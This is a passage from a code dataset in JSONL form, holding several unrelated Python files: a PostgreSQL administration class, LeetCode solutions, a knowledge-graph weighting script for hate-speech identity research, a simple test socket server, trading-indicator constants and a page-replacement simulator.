'short_desc', 'extra_desc',\n    'context', 'vartype', 'source', 'min_val', 'max_val', 'enumvals',\n    'boot_val', 'reset_val', 'sourcefile', 'sourceline'\n]\n\nSettings = namedtuple('Settings', SETTINGS_FIELDS)\n\n\nclass PostgresDB(object):\n    \"\"\"\n    An API for 
performing various database administration tasks on a PostgresDB server.\n \"\"\"\n _vartype_map = {\n 'bool': lambda x: True if x == 'on' else False,\n 'enum': lambda x: x,\n 'integer': lambda x: int(x),\n 'real': lambda x: float(x),\n 'string': lambda x: x,\n }\n\n def __init__(self, host='localhost', port=5432, database='postgres', user=None, password=None,\n sslmode=None, sslcert=None, sslkey=None, application_name='pydba (psycopg2)'):\n \"\"\"\n Constructor.\n\n All arguments are optional and sensible defaults. Override using args depending on your needs.\n\n Parameters\n ----------\n host: str, optional\n remote server IP address or hostname\n port: int, optional\n remote server port\n database: str, optional\n name of database to connect to\n user: str\n name of user (with required admin privileges)\n password:\n password for user\n sslmode: str, optional\n mode for SSL connection\n sslcert: str, optional\n file path to SSL certificate for connection\n sslkey: str, optional\n file path to SSL key for connection\n application_name: str, optional\n allow user to specify the app name in the connection\n \"\"\"\n if user is None:\n user = getpass.getuser()\n\n self._connect_args = dict(\n application_name=application_name,\n database=database, user=user, password=password,\n host=host, port=port,\n sslmode=sslmode, sslcert=sslcert, sslkey=sslkey,\n )\n\n self._bin_paths = {}\n\n def _run_stmt(self, stmt):\n with psycopg2.connect(**self._connect_args) as conn:\n conn.set_session(autocommit=True)\n with conn.cursor() as cur:\n cur.execute(stmt)\n log.info('done')\n\n def _iter_results(self, stmt):\n with psycopg2.connect(**self._connect_args) as conn:\n with conn.cursor() as cur:\n cur.execute(stmt)\n header = [col.name for col in cur.description]\n for row in cur:\n yield dict(zip(header, row))\n\n def _path_for(self, cmd):\n if cmd in self._bin_paths:\n return self._bin_paths[cmd]\n else:\n path = pexpect.which(cmd)\n if path is None:\n raise CommandNotFoundError('failed to find path of %r' % cmd)\n self._bin_paths[cmd] = path\n return path\n\n def _run_cmd(self, cmd, *args):\n cmd_line = [self._path_for(cmd)] + list(args)\n log.info('running: %r' % cmd_line)\n proc = subprocess.Popen(cmd_line, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = proc.communicate()\n if proc.returncode:\n log.error(stderr)\n else:\n if stdout:\n log.error('unexpected output: ' + stdout)\n if stderr:\n log.info(stderr)\n log.info('done')\n\n def names(self):\n \"\"\"Returns a list of all database names.\"\"\"\n stmt = \"\"\"\n select datname\n from pg_database\n where datistemplate = false\n \"\"\"\n return [x['datname'] for x in self._iter_results(stmt)]\n\n def exists(self, name):\n \"\"\"Returns True if named database exists, False otherwise.\"\"\"\n return name in self.names()\n\n def create(self, name):\n \"\"\"Creates a new database.\"\"\"\n log.info('creating database %s' % name)\n self._run_stmt('create database %s' % name)\n\n def drop(self, name):\n \"\"\"Drops an existing database.\"\"\"\n log.info('dropping database %s' % name)\n self._run_stmt('drop database %s' % name)\n\n def rename(self, from_name, to_name):\n \"\"\"Renames an existing database.\"\"\"\n log.info('renaming database from %s to %s' % (from_name, to_name))\n self._run_stmt('alter database %s rename to %s' % (from_name, to_name))\n\n def connections(self, name):\n \"\"\"Returns a list of existing connections to the named database.\"\"\"\n stmt = \"\"\"\n select {fields} from pg_stat_activity\n where datname = 
\n\n    def connections(self, name):\n        """Returns a list of existing connections to the named database."""\n        stmt = """\n            select {fields} from pg_stat_activity\n            where datname = {datname!r} and pid <> pg_backend_pid()\n        """.format(fields=', '.join(CONNECTION_FIELDS), datname=name)\n        return list(Connection(**x) for x in self._iter_results(stmt))\n\n    def kill_connections(self, name):\n        """Drops all connections to the specified database."""\n        log.info('killing all connections to database %s' % name)\n        self._run_stmt("""\n            select pg_terminate_backend(pid)\n            from pg_stat_activity\n            where datname = %r and pid <> pg_backend_pid()\n        """ % name)\n\n    def available(self, timeout=5):\n        """Returns True if database server is running, False otherwise."""\n        host = self._connect_args['host']\n        port = self._connect_args['port']\n        try:\n            sock = socket.create_connection((host, port), timeout=timeout)\n            sock.close()\n            return True\n        except socket.error:\n            pass\n        return False\n\n    def dump(self, name, filename):\n        """\n        Saves the state of a database to a file.\n\n        Parameters\n        ----------\n        name: str\n            the database to be backed up.\n        filename: str\n            path to a file where database backup will be written.\n        """\n        if not self.exists(name):\n            raise DatabaseError('database %s does not exist!' % name)\n        log.info('dumping %s to %s' % (name, filename))\n        self._run_cmd('pg_dump', '--verbose', '--blobs', '--format=custom',\n                      '--file=%s' % filename, name)\n\n    def restore(self, name, filename):\n        """\n        Loads the state of a backup file into a database.\n\n        Note\n        ----\n        If the named database does not exist, it will be created.\n\n        Parameters\n        ----------\n        name: str\n            the database to which backup will be restored.\n        filename: str\n            path to a file containing a postgres database backup.\n        """\n        if not self.exists(name):\n            self.create(name)\n        else:\n            log.warning('overwriting contents of database %s' % name)\n        log.info('restoring %s from %s' % (name, filename))\n        self._run_cmd('pg_restore', '--verbose', '--dbname=%s' % name, filename)\n\n    def _connect_options(self, name):\n        if name is None:\n            db_name = self._connect_args['database']\n        else:\n            db_name = name\n\n        options = [\n            ('dbname', db_name),\n            ('user', self._connect_args['user']),\n            ('host', self._connect_args['host']),\n            ('port', self._connect_args['port']),\n        ]\n\n        if self._connect_args['sslmode'] is not None:\n            options = options + [\n                ('sslmode', self._connect_args['sslmode']),\n                ('sslcert', os.path.expanduser(self._connect_args['sslcert'])),\n                ('sslkey', os.path.expanduser(self._connect_args['sslkey'])),\n            ]\n\n        return options\n\n    def connection_dsn(self, name=None):\n        """\n        Provides a connection string for the database.\n\n        Parameters\n        ----------\n        name: str, optional\n            an override database name for the connection string.\n\n        Returns\n        -------\n        str: the connection string (e.g. 'dbname=db1 user=user1 host=localhost port=5432')\n        """\n        return ' '.join("%s=%s" % (param, value) for param, value in self._connect_options(name))
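\n\n    # Sketch (added; illustrative only -- 'db1' is a hypothetical database name):\n    # the DSN can be fed straight back into psycopg2, e.g.:\n    #\n    #   with psycopg2.connect(db.connection_dsn('db1')) as conn:\n    #       ...  # run queries against db1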
\n\n    def connection_url(self, name=None):\n        """\n        Provides a connection string for database as a sqlalchemy compatible URL.\n\n        NB - this doesn't include special arguments related to SSL connectivity (which are outside the scope\n        of the connection URL format).\n\n        Parameters\n        ----------\n        name: str, optional\n            an override database name for the connection string.\n\n        Returns\n        -------\n        str: the connection URL (e.g. postgresql://user1@localhost:5432/db1)\n        """\n        return 'postgresql://{user}@{host}:{port}/{dbname}'.format(**{k: v for k, v in self._connect_options(name)})\n\n    def shell(self, expect=pexpect):\n        """\n        Connects the database client shell to the database.\n\n        Parameters\n        ----------\n        expect: module, optional\n            a pexpect-compatible module used to spawn the interactive psql shell.\n        """\n        dsn = self.connection_dsn()\n        log.debug('connection string: %s' % dsn)\n        child = expect.spawn('psql \"%s\"' % dsn)\n        if self._connect_args['password'] is not None:\n            child.expect('Password: ')\n            child.sendline(self._connect_args['password'])\n        child.interact()\n\n    def settings(self):\n        """Returns settings from the server."""\n        stmt = "select {fields} from pg_settings".format(fields=', '.join(SETTINGS_FIELDS))\n        settings = []\n        for row in self._iter_results(stmt):\n            row['setting'] = self._vartype_map[row['vartype']](row['setting'])\n            settings.append(Settings(**row))\n        return settings\n","repo_name":"drkjam/pydba","sub_path":"pydba/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":10078,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"32846695518","text":"# Definition for singly-linked list.\nclass ListNode(object):\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\nclass Solution:\n    def hasCycle(self, head):  # hash set of visited nodes\n        seen = set()\n        while head:\n            if head in seen:\n                return True\n            seen.add(head)\n            head = head.next\n        return False\n\n    def hasCycle1(self, head):  # fast & slow pointers (Floyd's cycle detection)\n        if not head or not head.next:\n            return False\n        slow = head\n        fast = head.next\n        while slow != fast:\n            if not fast or not fast.next:\n                return False\n            slow = slow.next\n            fast = fast.next.next\n        return True\n\nif __name__ == '__main__':\n    # (this acyclic list is immediately replaced by the cyclic one below)\n    list = ListNode(1, next=ListNode(2, next=ListNode(3, next=ListNode(4))))\n    node = ListNode(1)\n    list = ListNode(1, next=ListNode(2, next=ListNode(3, next=node)))\n    node.next = list  # the tail points back to the head, creating a cycle\n    solution = Solution()\n    res = solution.hasCycle(list)\n    print(res)","repo_name":"chenximei/LeetCode","sub_path":"141 Linked List Cycle.py","file_name":"141 Linked List Cycle.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18296146670","text":"\"\"\"\nQuestion 3 Longest Substring Without Repeating Characters:\nGiven a string s, find the length of the longest\nsubstring without repeating characters.\n\nExample 1:\nInput: s = \"abcabcbb\"\nOutput: 3\nExplanation: The answer is \"abc\", with the length of 3.\n\nExample 2:\nInput: s = \"bbbbb\"\nOutput: 1\nExplanation: The answer is \"b\", with the length of 1.\n\nExample 3:\nInput: s = \"pwwkew\"\nOutput: 3\nExplanation: The answer is \"wke\", with the length of 3.\nNotice that the answer must be a substring; \"pwke\" is a subsequence and not a substring.\n\"\"\"\n# Sliding Window\nclass Solution:\n    def lengthOfLongestSubstring(self, s: str) -> int:\n        # Create a new set\n        charSet = set()\n        # Set left pointer to first position\n        l = 0\n        # Create result var\n        res = 0\n\n        # Use right pointer to loop through string\n        for r in range(len(s)):\n            # While the character at the right pointer is already in the set,\n            # remove the character at the left pointer and advance the left pointer\n            while s[r] in charSet:\n                charSet.remove(s[l])\n                l += 1\n            # Add the right pointer character to the set\n            charSet.add(s[r])\n            # compute window size for result\n            res = max(res, r - l + 1)\n        return res
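\n\n# Quick check (added for illustration):\n#   Solution().lengthOfLongestSubstring(\"abcabcbb\")  # -> 3 (\"abc\")\n#   Solution().lengthOfLongestSubstring(\"pwwkew\")    # -> 3 (\"wke\")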
res","repo_name":"whume/leetcode","sub_path":"medium/3-longest-substring-without-repeating-characters.py","file_name":"3-longest-substring-without-repeating-characters.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2650127505","text":"\"\"\" Create and save in output folder weighted KG \"\"\"\n\nimport os, argparse\nimport operator, math\nimport time\n\nimport pandas as pd\nimport owlready2.namespace\nimport joblib\nfrom typing import List\n\nimport hate_datasets as dc\nimport functions.kg.utils as kg_utils\nimport functions.kg.indexing as kg_index\nimport functions.kg.weighting as kg_weight\nfrom functions.helper import save_dict\n\n# Global variables: cant use - or _ as separators\nTHRS = [0.5] # int (standard thresholding), str (different aggregation functions?)\nMATCH_METHODS = kg_index.MATCH_METHODS\nINFER_METHODS = kg_utils.INFER_METHODS\nWEIGHT_BY_SCORE = kg_weight.WEIGHT_BY_SCORE\nWEIGHT_BY_MODEL = kg_weight.WEIGHT_BY_MODEL\nWEIGHT_FS = kg_weight.WEIGHT_FS\n\nDNAMES = dc.DNAMES\nPROJ_DIR = os.getcwd()\nOUTPUT_FOLDER = f'{PROJ_DIR}/models/adaptation'\nCHECKPOINTS_FOLDER = f'{PROJ_DIR}/models/adaptation/checkpoints'\nDATA_FOLDER = f'{PROJ_DIR}/data'\n\n\ndef collect_owl_from_path(kg_path: str,\n output_folder: str = OUTPUT_FOLDER) -> owlready2.namespace.Ontology:\n \"\"\" Load saved version of ontology from local repository or import from owl path and save a copy \"\"\"\n fname = kg_path.split('/')[-1]\n o_path = f'{output_folder}/{fname}'\n if os.path.exists(o_path):\n kg = kg_utils.load_owl(o_path)\n print('Found OWL file in output folder. Importing.')\n else:\n kg = kg_utils.load_owl(kg_path)\n if not os.path.exists(output_folder):\n os.mkdir(output_folder)\n kg.save(file=o_path)\n print(f'OWL collected from {kg_path} and saved in output folder.')\n return kg\n\n\ndef disproportionate_stratified_sampling(n: int, df: pd.DataFrame, col_to_sample: List) -> pd.DataFrame:\n \"\"\"\n Get sample of size n from df using stratified sample.\n Returning balanced samples of populations indicated by binary columns in col_to_sample list\n More info on disproportionate sampling: https://www.geeksforgeeks.org/stratified-sampling-in-pandas/\n \"\"\"\n # 1. Create sampling dict: needed for balanced sampling with no repetitions\n # dict of index lists which are unique in each group in ascending order\n\n # a. get group sample sizes in ascending order\n sample_sizes = {gi: df.loc[df[gi] == 1].shape[0] for gi in col_to_sample}\n sample_sizes = dict(sorted(sample_sizes.items(), key=operator.itemgetter(1)))\n #print(sample_sizes)\n\n # b. get sample id lists for each group that are unique according to sample size ascending order\n sampling_dict, ids_inc = {}, []\n for g in sample_sizes.keys():\n sampling_dict[g] = df.loc[(df[g] == 1) & (~df.index.isin(ids_inc))].index.to_list()\n ids_inc += sampling_dict[g]\n\n # 2. Create balanced sampled df\n # df subset of n size\n\n # a. 
get subgroup sample sizes, i.e. how many samples can be extracted from each subgroup given the final sample size N\n    sampling_sizes = {}\n    n_remaining, g_remaining = n, list(sample_sizes.keys())\n    for g in sample_sizes.keys():\n        sample_size = len(sampling_dict[g])\n        subg_n = math.ceil(n_remaining/len(g_remaining))\n        sampling_sizes[g] = sample_size if subg_n > sample_size else subg_n\n        # update remaining sample sizes and groups to sample from\n        n_remaining = n_remaining - sampling_sizes[g]\n        g_remaining.remove(g)\n    #print(sampling_sizes)\n\n    # b. return the balanced sample of df by randomly drawing, from each subgroup, a sample of its\n    # corresponding sample size\n    sampled_ids = []\n    for g in sample_sizes.keys():\n        # print(f'{g}: sampling_sizes: {sampling_sizes[g]} sample size: {sample_sizes[g]}')\n        g_sample = pd.Series(sampling_dict[g]).sample(n=sampling_sizes[g], random_state=1)\n        sampled_ids += g_sample.to_list()\n\n    sampled_df = df.loc[df.index.isin(sampled_ids)].copy()\n    return sampled_df\n\n\ndef adaptation_subset(d: pd.DataFrame,\n                      g_labels: dict,\n                      dname: str,\n                      thr: int,\n                      identities: List = None,\n                      data_folder: str = DATA_FOLDER):\n    \"\"\"\n    Build df_train for KG adaptation: adds a binary 'identities' column marking a sample of related and unrelated texts.\n    Can be at group (e.g., gender) or subgroup (e.g., male) level.\n    Rule to determine n (max possible sample for Npos=Nneg).\n    \"\"\"\n    if identities is None:\n        identities = ['gender', 'sexual_orientation']\n    y_col = ''.join([i for identity in identities for i in identity.split('_')])\n    print(f\"Sampling distribution with thr={thr} for {y_col}\")\n    # Create binary columns with groups over thr (g_labels keys) and\n    # nones (i.e., texts with no identity group labels over thr (\"None\"))\n    if identities[0] in g_labels.keys():\n        # ... groups\n        g_labels = list(g_labels.keys())\n    else:\n        # ... subgroups\n        g_labels = [subg_i for subg_l in g_labels.values() for subg_i in subg_l]\n    g_labels_bin = []\n    for g in list(g_labels):\n        d.loc[:, f'{g}_{thr}'] = d[f'{g}'].apply(lambda perc: 1 if perc >= thr else 0)\n        g_labels_bin.append(f'{g}_{thr}')\n    d.loc[:, f'none_{thr}'] = d.apply(lambda row: 1 if sum(row[g_labels_bin]) == 0 else 0, axis=1)\n    g_labels_bin.append(f'none_{thr}')\n    print(f' {d.loc[d[f\"none_{thr}\"] == 1,].shape[0]}/{d.shape[0]} samples with no identity label >= {thr}')\n\n    if len(identities) == 2:\n        id_1, id_2 = identities\n        # Take n (minimum samples of either positive group)\n        d_1, d_2 = d.loc[d[f'{id_1}_{thr}'] == 1], d.loc[d[f'{id_2}_{thr}'] == 1]\n        n_pos_min = min(d_1.shape[0], d_2.shape[0])\n        print(f' min {id_1} or {id_2} sample: {n_pos_min}')\n\n        # Get balanced positive sample: with all samples from min pos group and n sample from the other pos group\n        col_pos = [f'{g}_{thr}' for g in identities]\n        if (d_1.loc[~d_1.index.isin(d_2.index)].shape[0] >= n_pos_min) or (d_2.loc[~d_2.index.isin(d_1.index)].shape[0] >= n_pos_min):\n            # ... there are enough disjoint examples from the majority class to draw a balanced sample\n            pos_df = disproportionate_stratified_sampling(2*n_pos_min, d, col_pos)\n        else:\n            # ... 
need to take n sample from both and remove duplicates\n pos_samples = [d_1.sample(n=n_pos_min, random_state=1), d_2.sample(n=n_pos_min, random_state=1)]\n pos_df = pd.concat(pos_samples, join='inner')\n pos_df = pos_df[~pos_df.duplicated()]\n neg_df = d.loc[(d[f'{id_1}_{thr}'] == 0) & (d[f'{id_2}_{thr}'] == 0)].copy()\n elif len(identities) == 1:\n col_pos = [f'{identities[0]}_{thr}']\n pos_df = d.loc[d[col_pos[0]] == 1].copy()\n neg_df = d.loc[d[col_pos[0]] == 0].copy()\n else:\n raise Exception(f'Adaptation not supported for more than 2 identities, provided {identities}')\n n_pos = pos_df.shape[0]\n pos_df[y_col] = n_pos * [1]\n print(f' {n_pos} unique positive samples ')\n if len(identities) == 2:\n print(f'2*n ({n_pos_min}) = {2 * n_pos_min} - {2 * n_pos_min - n_pos} duplicates')\n for g in col_pos:\n print(f' -- {g}: {pos_df.loc[pos_df[g] == 1,].shape[0]}')\n\n # Get balanced negative sample of n_pos sample size: stratification with disproportionate sampling\n col_to_stratify = [x for x in g_labels_bin if x not in col_pos]\n neg_df = disproportionate_stratified_sampling(n_pos, neg_df, col_to_stratify)\n neg_df[y_col] = n_pos * [0]\n print(f' {neg_df.shape[0]} unique negative samples:')\n for g in col_to_stratify:\n print(f' -- {g}: {neg_df.loc[neg_df[g] == 1,].shape[0]}')\n\n # Take df_eval as d.notin(df_train)\n df_train = pd.concat([pos_df, neg_df])\n # ... ensure that values in either pos_label are unique\n df_train = df_train[~df_train.duplicated(subset=df_train.columns.to_list()[:-1])]\n print(f' {df_train.shape[0]} unique train samples: '\n f'2*n ({n_pos}) = {2 * n_pos} - {2 * n_pos - df_train.shape[0]} duplicates:')\n print(f' -- {y_col}: \\n{df_train[y_col].value_counts()}')\n df_eval = d.loc[~d.index.isin(df_train.index.to_list())]\n\n # Save pre-training corpus as CSV in data folder (if not None)\n if data_folder:\n export_name = '{}_{}_{}'.format(dname, thr, y_col)\n o_path = f'{data_folder}/{export_name}.csv'\n df_train.to_csv(o_path, index=False)\n print(f' Pre-training corpus exported to {data_folder}: {export_name}')\n\n return df_train, df_eval\n\n\ndef __get_inferred(ent_assert: list,\n kg: owlready2.namespace.Ontology,\n infer_method: str) -> List:\n \"\"\" Return list of all entities inferred in the list of asserted entities \"\"\"\n # Use KG structure to infer new entity information\n if infer_method == 'hierarchical':\n # ... 
[c1.iri, c2.iri, c11.iri]\n        from functions.kg.utils import get_hierarchical_info\n        ent_infer = [c_infer for c_assert in ent_assert\n                     for c_infer in get_hierarchical_info(c_assert, kg)]\n    elif infer_method == 'none':\n        ent_infer = []\n    else:\n        raise Exception(f'{infer_method}: invalid method for using KG structure to infer information about terminology. '\n                        f'Select a method from the list: ' + ', '.join(INFER_METHODS))\n    return ent_infer\n\n\ndef __entity_matching(df: pd.DataFrame,\n                      inv_index: kg_index.EntityMatching,\n                      text_col: str,\n                      id_col: str,\n                      kg: owlready2.namespace.Ontology,\n                      checkpoint_root: str,\n                      match_method: str,\n                      infer_method: str):\n    print(f'Identifying entities asserted and inferred in train subset: infer_method = {infer_method}')\n    matching_df = pd.DataFrame()\n    check_asserted = f'{checkpoint_root}.pkl'\n    if not os.path.exists(check_asserted):\n        print(' matching entities')\n        # Create KG dicts for entity matching ({entity: [label, synonym, etc]})\n        kg_dict = kg_utils.get_kg_dict(kg)\n\n        # Return list of entities asserted in the text\n        matching_df['ent_assert'] = kg_utils.get_entity_matches(df, inv_index, text_col, id_col, kg_dict, match_method)\n        matching_df['ent_assert'].to_pickle(check_asserted)\n        print(' checkpoint to: {}'.format(check_asserted))\n    else:\n        print(' found checkpoint of matched entities. Importing from: {}'.format(check_asserted))\n        matching_df['ent_assert'] = pd.read_pickle(check_asserted)\n\n    check_inferred = f'{checkpoint_root}-{infer_method}.pkl'\n    if not os.path.exists(check_inferred):\n        print(' inferring information from asserted entities')\n        matching_df['ent_infer'] = matching_df['ent_assert'].apply(\n            lambda ent_assert: __get_inferred(ent_assert, kg, infer_method)\n        )\n        matching_df['ent_infer'].to_pickle(check_inferred)\n        print(' checkpoint to: {}'.format(check_inferred))\n    else:\n        print(' found checkpoint of inferred entities. Importing from: {}'.format(check_inferred))\n        matching_df['ent_infer'] = pd.read_pickle(check_inferred)\n\n    # Return list of inferred entities\n    return matching_df.apply(lambda row: row['ent_assert'] + row['ent_infer'], axis=1)\n\n\ndef __compute_weights(d_train: pd.DataFrame,\n                      X_col: str,\n                      y_col: str,\n                      weighting_f: str,\n                      o_path: str):\n    print(\"Computing and saving entity weights to get weighted KG ({IRI: weight}): \"\n          f\"weighting f={weighting_f}\")\n    if weighting_f in WEIGHT_BY_SCORE:\n        # Exporting weights from ratios in positive and negative class\n        ent_match_pos = d_train.loc[d_train[y_col] == 1, X_col]\n        ent_match_neg = d_train.loc[d_train[y_col] == 0, X_col]\n\n        # Computing the weights\n        if weighting_f == 'docf':\n            # Get document frequencies in positive and negative space (unique occurrences by number of docs)\n            freq_pos = kg_weight.get_DocF(ent_match_pos)\n            freq_neg = kg_weight.get_DocF(ent_match_neg)\n\n            # Compute weights as the avg of the difference in both classes\n            weights = kg_weight.get_ratio(freq_pos, freq_neg)\n        else:\n            raise Exception(f'{weighting_f} weight function not in list of scoring methods: {WEIGHT_BY_SCORE}')\n        # Saving results:\n        save_dict(weights, o_path)\n\n    elif weighting_f in WEIGHT_BY_MODEL:\n        # Exporting weights from the feature coefficients of LR model trained on entities\n        pipeline = kg_weight.get_ML_coefficients(d_train, X_col, y_col, weighting_f)\n        # The fitted pipeline bundles the vectorizer and the model; 
save them together with joblib.\n        joblib.dump(pipeline, f'{o_path}.joblib')\n\n    else:\n        raise Exception(f'{weighting_f}: invalid method for weighting entities based on their distribution. '\n                        f'Select a method from the list: ' + ', '.join(WEIGHT_FS))\n\n\ndef kg_adaptation(dname: str,\n                  kg_path: str,\n                  identities: List[str],\n                  **opt_config):\n    # Parse with default config parameters\n    config = {'thr': THRS[0],\n              'match_method': MATCH_METHODS[0],\n              'infer_method': INFER_METHODS,\n              'weight_f': WEIGHT_FS}\n    for k, v in opt_config.items():\n        if k in config.keys():\n            config[k] = v\n\n    # Import processed df from data folder\n    d, text_col, id_col, g_labels = dc.import_dataset(dname)\n    y_col = ''.join([i for identity in identities for i in identity.split('_')])\n\n    # Import and save kg to result folder\n    kg = collect_owl_from_path(kg_path)\n    kg_name = kg_path.rsplit('.', 1)[-2].split('/')[-1]\n\n    # Draw the pre-training corpus from the identities\n    d_train, _ = adaptation_subset(d, g_labels, dname, config[\"thr\"], identities)\n\n    # Entity matching: identify entities asserted and inferred in text using KG\n    check_root = f'{CHECKPOINTS_FOLDER}/{kg_name}_{dname}_{y_col}_{config[\"thr\"]}-{config[\"match_method\"]}'\n    if not os.path.exists(CHECKPOINTS_FOLDER):\n        os.mkdir(CHECKPOINTS_FOLDER)\n    # Method 3: how to create index to do the entity matching\n    t0 = time.time()\n    # ... create custom index col (not required for creating entity weights)\n    d_train[id_col] = range(0, d_train.shape[0])\n    d_train[id_col] = d_train[id_col].astype(str)  # stringify ids (avoids shadowing the id() builtin in a lambda)\n    # ... create inverted index\n    inv_index = kg_index.indexing_df(d_train, text_col, id_col, config[\"match_method\"])\n    print(\"Executed in %s seconds.\" % str(time.time() - t0))\n\n    # Method 4: how to use KG structure to identify terminology (infer methods)\n    for infer_method in config[\"infer_method\"]:\n        t0 = time.time()\n        # ... do entity matching and infer information from kg\n        d_train['entity_matches'] = __entity_matching(d_train,\n                                                      inv_index,\n                                                      text_col,\n                                                      id_col,\n                                                      kg,\n                                                      check_root,\n                                                      config[\"match_method\"],\n                                                      infer_method)\n        print(\"Executed in %s seconds.\" % str(time.time() - t0))\n\n        for weight_f in config[\"weight_f\"]:\n            # Method 5: how to weight entities based on the training corpus context\n            # Create or extend the weights of a KG for this corpus context\n            t0 = time.time()\n            # ... 
get the path to output weights\n            method_name = '-'.join([str(config[\"thr\"]), config[\"match_method\"], infer_method, weight_f])\n            o_path = f'{OUTPUT_FOLDER}/{kg_name}_{dname}_{y_col}_{method_name}'\n\n            __compute_weights(d_train,\n                              'entity_matches',\n                              y_col,\n                              weight_f,\n                              o_path)\n            print(\"Executed in %s seconds.\" % str(time.time() - t0))\n            # ...to explore: weights = pd.DataFrame.from_dict(weights, orient='index')\n            print(' Success exporting entity weights to: {}'.format(o_path))\n\n    return\n\n\ndef main():\n    desc = \"Create and save the weighted KG and its evaluation subset in the result folder\"\n    parser = argparse.ArgumentParser(description=desc)\n\n    # Required arguments\n    parser.add_argument(\"--d_name\",\n                        default=None,\n                        type=str,\n                        required=True,\n                        help=f\"Pre-training corpus for the KG adaptation: {DNAMES}\",\n                        )\n\n    parser.add_argument(\"--knowledge_graph_path\",\n                        default=None,\n                        type=str,\n                        required=True,\n                        help=\"Path to knowledge graph OWL file.\",\n                        )\n\n    parser.add_argument(\"--identities_pretraining\",\n                        default=None,\n                        type=str,\n                        required=True,\n                        help=\"Column names in pre-training corpus for the identities (groups or subgroups) \"\n                             \"based on which to assign weights to the KG\"\n                             \" (up to 2 identity groups or subgroups, separated by ,)\",\n                        )\n\n    # Optional arguments\n    parser.add_argument(\"--thr\",\n                        default=0.5,\n                        type=str,\n                        required=False,\n                        help=\"Configuration argument: \\n\"\n                             \"-- threshold to binarize labels (default: 0.5 percentage of annotator agreement).\",\n                        )\n\n    parser.add_argument(\"--match_method\",\n                        default='stem',\n                        type=str,\n                        required=False,\n                        help=\"Configuration argument: \\n\"\n                             \"-- matching method applied to texts (default: stemming).\",\n                        )\n\n    parser.add_argument(\"--infer_method\",\n                        default='hierarchical',\n                        type=str,\n                        required=False,\n                        help=\"Configuration argument: \\n\"\n                             \"-- method for inferring entity information from the KG (default: use hierarchy).\",\n                        )\n\n    parser.add_argument(\"--weight_f\",\n                        default='docf',\n                        type=str,\n                        required=False,\n                        help=\"Configuration argument: \\n\"\n                             \"-- method for weighting entities based on distribution \"\n                             \"(default: use document frequencies).\",\n                        )\n\n    args = parser.parse_args()\n\n    # parse kwargs from optional arguments (specified or default values)\n    other_args = {'thr': float(args.thr),\n                  'match_method': args.match_method,\n                  'infer_method': [args.infer_method],\n                  'weight_f': [args.weight_f]}\n\n    print('Computing entity weights: {}\\n Optional args: {}'.format(args, other_args))\n    kg_adaptation(args.d_name,\n                  args.knowledge_graph_path,\n                  args.identities_pretraining.split(','),\n                  **other_args)\n    return\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"preyero/hate-speech-identities","sub_path":"kg_adaptation.py","file_name":"kg_adaptation.py","file_ext":"py","file_size_in_byte":19424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33415668180","text":"#!/usr/bin/python3\nimport socket\nimport time\n\nIP = \"127.0.0.1\"\nport = 8080\n\n# create socket object\ns = socket.socket()\ns.bind(('', port))\nprint (f\"socket bound to {port}\")\n\n# set listener\ns.listen(5)\nprint (\"socket is listening\")\n\n\nwith open('./response.txt', 'r') as fp:\n    resp = fp.read()\n\nresp = resp.encode('utf-8')\n\nwhile True:\n    c, addr = s.accept()\n    print ('Got a connection')\n    rec = (c.recv(1024))\n    print(rec.decode('utf-8'))\n\n    time.sleep(999)  # long pause before replying (presumably to exercise client/proxy timeouts)\n\n    c.send(resp)\n\n    c.close()
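\n\n    # Added note (not in the original script): c.send() may transmit only part of\n    # resp; socket.sendall() retries until the whole payload has been written, e.g.:\n    #   c.sendall(resp)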
\n\n\n","repo_name":"LibertyCyber/ProxyIntercept","sub_path":"testing/intercept.py","file_name":"intercept.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41032844340","text":"# Define indicator thresholds\nrsi_oversold = 30\nrsi_overbought = 70\nmacd_threshold = 0 # MACD line crosses above 0\nstoch_oversold = 20\nstoch_overbought = 80\ncci_oversold = -100\ncci_overbought = 100\nmfi_oversold = 30\nmfi_overbought = 70\nmin_volume = 10000000 # Minimum volume threshold\n","repo_name":"Membur/signal-new","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2805878506","text":"import argparse\nimport sys\n\nclass Manager:\n def __init__(self, input):\n input = input.replace(\"\\n\", \"\")\n input = input.split('|')\n self.n_frames = int(input[0])\n self.frames = [False]*self.n_frames\n self.n_pages = int(input[1])\n self.sequential_page_accesses_to_store = input[2].split(' ')\n self.sequential_page_accesses = []\n self.algorithms_page_exchange = dict([('FIFO', 0), ('MRU', 0), ('NUF', 0), ('OPTIMAL', 0)])\n self.FIFO_aux = []\n self.MRU_aux = []\n self.NUF_aux = []\n\n def reset(self):\n self.sequential_page_accesses = self.sequential_page_accesses_to_store.copy()\n self.frames = [False]*self.n_frames\n self.FIFO_aux = []\n self.MRU_aux = []\n self.NUF_aux = []\n \n def show(self):\n print(\"Manager -> frame: {} | page: {} | sequnetial_accesses: {}\".format(self.n_frames, self.n_pages, self.sequential_page_accesses_to_store))\n print(\"Frames:\", self.frames)\n\n def output(self):\n # print(Número de trocas de página no algoritmo FIFO|Número de trocas de página no algoritmo MRU|Número de trocas de página no algoritmo NUF|Número de trocas de página no algoritmo ótimo|nome do algoritmo com desempenho mais próximo do ótimo) \n self.optimal_algorithm()\n self.FIFO_algorithm()\n self.MRU_algorithm()\n self.NUF_algorithm()\n # print(self.algorithms_page_exchange)\n APE_aux = self.algorithms_page_exchange.copy()\n APE_aux.pop('OPTIMAL')\n # encontra o menor valor \n better = min(APE_aux, key=lambda key: APE_aux[key])\n # testa quantos valores tem o mesmo valor do melhor\n test = [APE_aux[key] == APE_aux[better] for key in APE_aux.keys()]\n if 